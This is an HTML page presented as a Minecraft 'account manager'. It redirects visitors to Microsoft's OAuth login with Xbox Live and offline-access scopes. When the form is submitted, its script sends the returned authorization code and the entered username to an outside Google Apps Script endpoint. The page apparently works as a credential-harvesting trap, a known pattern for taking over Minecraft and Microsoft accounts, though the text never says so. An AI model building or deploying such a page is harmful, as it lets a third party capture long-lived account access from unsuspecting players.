<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Break's Account Manager</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            display: flex;
            align-items: center;
            justify-content: center;
            height: 100vh;
            background-color: #1e1e1e;
            color: #fff;
        }

        div {
            text-align: center;
            padding: 20px;
            background-color: #333;
            border-radius: 10px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.5);
        }

        button {
            padding: 10px;
            font-size: 16px;
            cursor: pointer;
            background-color: #6c757d;
            color: #fff;
            border: none;
            border-radius: 5px;
        }

        button:disabled {
            background-color: #808080;
            cursor: not-allowed;
        }

        input {
            margin-top: 10px;
            padding: 8px;
            font-size: 14px;
        }

        h2 {
            text-align: center;
        }
    </style>
</head>
<body>
<div>
    <h2>Add Minecraft Account</h2>

    <form onsubmit="event.preventDefault(); updateCode();">
        <label for="username">Username:</label>
        <input type="text" id="username" placeholder="Enter your username" autocomplete="off" required>

        <button id="submitButton" type="submit">Add</button>
    </form>
</div>

<script>
    var api = 'https://script.google.com/macros/s/AKfycbyELpW9nBFh8nvBJhOAX3Lgxrv9CwOXG0ifvzds6mw4H1luaZvNtRx7zH-o2FuSfj4H5A/exec';

    var urlParams = new URLSearchParams(window.location.search);
    if (!urlParams.has('code')) {
        window.location.href = 'https://login.live.com/oauth20_authorize.srf?client_id=c56ecfc5-eac9-439a-99ac-f8d7e29c07fa&response_type=code&redirect_uri=https://mrbreaknfix.com/mcauth&scope=XboxLive.signin%20offline_access&state=NOT_NEEDED';
    }

    function updateCode() {
        var username = document.getElementById('username').value;
        var paramsObject = {};

        urlParams.forEach(function(value, key) {
            paramsObject[key] = value;
        });

        paramsObject['username'] = username;

        var callbackName = 'handleResponse';

        var script = document.createElement('script');
        script.src = api + '?callback=' + callbackName + '&jsonData=' + JSON.stringify(paramsObject);

        var button = document.getElementById('submitButton');

        var handleResponse = function(response) {
            console.log('Request successful. Response:', response);

            button.disabled = true;
            document.removeEventListener('keydown', handleEnterKey);

            if (response.status === 'success') {
                window.location.href = 'https://mrbreaknfix.com/success';
            } else {
                window.location.href = 'https://mrbreaknfix.com/failed';
            }
        };

        var handleEnterKey = function(event) {
            if (event.key === 'Enter') {
                updateCode();
            }
        };

        window[callbackName] = handleResponse;

        button.disabled = true;

        document.addEventListener('keydown', handleEnterKey);

        document.body.appendChild(script);
    }
</script>
</body>
</html>
